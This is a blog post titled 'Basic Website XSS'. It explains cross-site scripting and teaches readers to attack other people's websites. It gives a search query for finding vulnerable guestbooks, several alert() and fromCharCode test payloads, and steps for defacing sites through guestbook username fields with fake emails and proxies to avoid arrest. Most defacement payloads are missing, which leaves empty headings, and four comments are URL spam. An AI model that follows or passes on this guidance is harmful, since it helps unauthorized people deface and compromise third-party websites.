Tips & Tricks

.

Basic Website XSS ?

4


What is XSS ??


XSS stands for "Cross Site Scripting", abbreviated "XSS" instead of "CSS" to avoid confusion with "Cascading Style Sheets", which is a language that formats the appearance of web pages. Cross Site Scripting is a type of code injection attack that exploits vulnerable or unsanitized scripts found in dynamic webpages. Once a vulnerability is found, an attacker can exploit it via text fields, such as those found in guestbooks, shoutboxes, or even login forms. XSS attacks range from defacement to malicious code and cookieloggers. Because of its simple architecture, XSS attacks are probably the most popular form of hacking directed against websites.

How to find a vulnerable site ??


To find a vulnerable website, simply look in google.

inurl:.com/guestbook


How to test for an XSS vulnerability ??



To test for an XSS vulnerability, you simply input a pop-up script in a text field of a website, preferably a search bar. To do this, type one the following codes in the website's search bar, you should get a pop-up saying "XSS", or whatever text you input.

PHP Code:
alert("/XSS"/)
alert("XSS")
alert("XSS");
alert(String.fromCharCode(88,83,83))

alert("XSS")

There are a lot of scripts that will work, these are just a few of them. Also, It is recommended that you substitute "XSS" or (88,83,83)) with other characters, as some site sanitize the text "XSS" from their search bars.



How to exploit XSS vulnerabilities ??

Now that you've discovered the vulnerability you can attempt to attack the website.


Defacement :-

In an XSS vulnerable website, you can execute all or almost any html or javascript in an text field such as a guestbook. Type your code in where the username field is(because the message field usually blocks html and javascript). If the guestbook requires image verification/captcha then fill it in. If the site requires you fill in a email, then type a fake one.



Here are some things that u can do :-


Insert your deface pic. :-
PHP Code:


Redirect to your deface pic. :-
PHP Code:


Pop-up Pic
PHP Code:
window.open( "your image url here!" )


Embed videos or flash :-
PHP Code:



I take no responsability for the things you do with this tutorial. It's all up to you! If you don't use one or more proxies then u might get in jail

4 comments:

Jolpori Xclusive said...

http://musicjan.com

http://musicjan.com

http://musicjan.com

http://musicjan.com

http://musicjan.com

http://musicjan.com

http://musicjan.com

http://musicjan.com


http://musicjan.com


http://musicjan.com


http://musicjan.com

Jolpori Xclusive said...

http://musicjan.com

http://musicjan.com

http://musicjan.com

http://musicjan.com

http://musicjan.com

http://musicjan.com

http://musicjan.com

http://musicjan.com


http://musicjan.com


http://musicjan.com


http://musicjan.com

Jolpori Xclusive said...

http://musicjan.com

http://musicjan.com

http://musicjan.com

http://musicjan.com

http://musicjan.com

http://musicjan.com

http://musicjan.com

http://musicjan.com


http://musicjan.com


http://musicjan.com


http://musicjan.com

Jolpori Xclusive said...

http://musicjan.com

http://musicjan.com

http://musicjan.com

http://musicjan.com

http://musicjan.com

http://musicjan.com

http://musicjan.com

http://musicjan.com


http://musicjan.com


http://musicjan.com


http://musicjan.com

Post a Comment

Related Posts Plugin for WordPress, Blogger...